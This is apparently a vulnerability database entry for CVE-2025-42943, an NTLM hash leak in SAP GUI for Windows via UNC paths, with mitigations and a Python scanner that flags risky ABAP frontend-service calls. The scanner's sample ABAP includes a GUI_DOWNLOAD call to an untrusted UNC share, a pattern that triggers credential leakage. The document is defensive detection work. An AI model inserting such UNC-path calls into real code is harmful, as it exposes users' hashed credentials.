CVE-2025-42943: CWE-250: Execution with Unnecessary Privileges in SAP_SE SAP GUI for Windows
SAP GUI for Windows may allow the leak of NTLM hashes when specific ABAP frontend services are called with UNC paths. For a successful attack, the attacker needs developer authorization in a specific Application Server ABAP to make changes in the code, and the victim needs to execute that code using SAP GUI for Windows. This could trigger automatic NTLM authentication, potentially exposing hashed credentials to an attacker. As a result, it has a high impact on confidentiality.
AI Analysis
Technical Summary
CVE-2025-42943 is a medium-severity vulnerability affecting SAP GUI for Windows version BC-FES-GUI 8.00. The issue arises from execution with unnecessary privileges (CWE-250), specifically when certain ABAP frontend services are invoked using UNC (Universal Naming Convention) paths. An attacker with developer authorization on a specific Application Server ABAP can modify code to exploit this flaw. When a victim uses SAP GUI for Windows to access these manipulated services, the system may automatically perform NTLM authentication, inadvertently leaking NTLM hashed credentials over the network. This leakage compromises the confidentiality of user credentials, potentially allowing attackers to perform credential replay or offline cracking attacks. The vulnerability requires high privileges (developer authorization) to set up the malicious code and user interaction (victim executing SAP GUI) to trigger the leak. The CVSS 3.1 score is 4.5 (medium), reflecting network attack vector, low attack complexity, high privileges required, and user interaction needed, with a high impact on confidentiality but no impact on integrity or availability. No known exploits are reported in the wild, and no patches are currently linked, indicating the need for proactive mitigation. This vulnerability highlights the risk of excessive privilege use in SAP environments and the dangers of automatic NTLM authentication in enterprise applications.
Potential Impact
For European organizations, especially those heavily reliant on SAP ERP systems, this vulnerability poses a significant confidentiality risk. Leaked NTLM hashes can be used by attackers to escalate privileges or move laterally within corporate networks, potentially exposing sensitive business data, financial records, or personal data protected under GDPR. Given SAP's widespread adoption in Europe across sectors such as manufacturing, finance, and public administration, exploitation could lead to data breaches with regulatory and reputational consequences. The requirement for developer authorization limits the attack surface to insiders or compromised developer accounts, but the impact remains critical if exploited. Additionally, the automatic NTLM authentication behavior could expose credentials across internal networks, increasing risk in environments with weak network segmentation. The vulnerability does not affect system integrity or availability directly but undermines trust in credential confidentiality, which can cascade into broader security incidents.
Mitigation Recommendations
European organizations should implement the following specific measures:
1) Restrict developer authorization strictly to trusted personnel and regularly audit these privileges to prevent unauthorized code changes.
2) Monitor and log ABAP code changes and frontend service calls involving UNC paths to detect suspicious activity.
3) Disable or limit the use of automatic NTLM authentication in SAP GUI where feasible, or enforce SMB signing and encryption to protect NTLM hashes in transit.
4) Apply network segmentation to isolate SAP Application Servers and limit exposure of SMB/UNC traffic to trusted zones only.
5) Educate SAP users about the risks of executing untrusted code or services via SAP GUI.
6) Engage with SAP support to obtain patches or workarounds once available and prioritize their deployment.
7) Employ multi-factor authentication and strong password policies to reduce the risk of credential compromise from leaked hashes.
These targeted actions go beyond generic advice by focusing on privilege management, network controls, and SAP-specific configurations.
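As an added example supporting the monitoring measure above (it is not SAP's code and not part of this advisory), the following Python scan walks constructed ABAP source and flags frontend-service calls whose client-side path is a UNC literal or a runtime variable that needs review. The list of frontend-service entry points and the path parameter names are assumptions for this example and are not exhaustive.

```python
import re
from collections import namedtuple

# Real SAP frontend-service entry points that take a client-side path; the
# list itself is an assumption for this example and is not exhaustive.
FRONTEND_APIS = (
    "cl_gui_frontend_services=>gui_download", "cl_gui_frontend_services=>gui_upload",
    "cl_gui_frontend_services=>file_exist", "'gui_download'", "'gui_upload'",
)
# Path-carrying parameters (assumed set), assigned either a quoted literal or a variable.
PATH_PARAM = re.compile(
    r"\b(filename|file|directory|document|application)\s*=\s*(?:'([^']*)'|([a-z_]\w*))", re.I)
# kind is "UNC_LITERAL" (path starts with \\) or "DYNAMIC_PATH" (needs manual review)
Finding = namedtuple("Finding", "stmt api kind value")

def split_statements(source):
    # Join ABAP lines into period-terminated statements; drop * and " comments.
    stmts, buf = [], []
    for line in source.splitlines():
        code = "" if line.startswith("*") else line.split('"', 1)[0].strip()
        if not code:
            continue
        buf.append(code)
        if code.endswith("."):
            stmts.append(" ".join(buf)[:-1])
            buf = []
    return stmts

def scan_abap(source):
    # Flag frontend-service calls whose path is a UNC literal or a runtime variable.
    findings = []
    for n, stmt in enumerate(split_statements(source), 1):
        low = stmt.lower()
        api = next((a for a in FRONTEND_APIS if a in low), None)
        if api is None:
            continue
        for m in PATH_PARAM.finditer(stmt):
            literal, var = m.group(2), m.group(3)
            if literal is None:
                findings.append(Finding(n, api, "DYNAMIC_PATH", var))
            elif literal.startswith("\\\\"):
                findings.append(Finding(n, api, "UNC_LITERAL", literal))
    return findings

# Constructed sample fragment: a benign local download, a UNC download, a dynamic path.
SAMPLE_ABAP = r"""
* constructed sample, not real customer code
CALL METHOD cl_gui_frontend_services=>gui_download
  EXPORTING filename = 'C:\temp\report.txt'  " local path, benign
  CHANGING  data_tab = lt_data.
CALL FUNCTION 'GUI_DOWNLOAD'
  EXPORTING filename = '\\untrusted-host\share\report.txt'
  TABLES    data_tab = lt_data.
cl_gui_frontend_services=>file_exist( EXPORTING file = lv_path RECEIVING result = DATA(lv_exists) ).
"""
```

Running `scan_abap(SAMPLE_ABAP)` reports the UNC literal in the second statement and the variable path in the third, while the local path in the first statement is not flagged.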
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Sweden, Belgium
Technical Details
- Data Version: 5.1
- Assigner Short Name: sap
- Date Reserved: 2025-04-16T13:25:37.187Z
- Cvss Version: 3.1
- State: PUBLISHED
Threat ID: 689aa7d2ad5a09ad002be76a
Added to database: 8/12/2025, 2:32:50 AM
Last enriched: 8/12/2025, 2:51:17 AM
Last updated: 8/31/2025, 11:11:11 AM
Related Threats
- CVE-2025-58178: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') in SonarSource sonarqube-scan-action (High)
- CVE-2025-58162: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in MobSF Mobile-Security-Framework-MobSF (Medium)
- CVE-2025-58161: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in MobSF Mobile-Security-Framework-MobSF (Low)
- CVE-2025-9806: Hard-coded Credentials in Tenda F1202 (Low)
- CVE-2025-9805: Server-Side Request Forgery in SimStudioAI sim (Medium)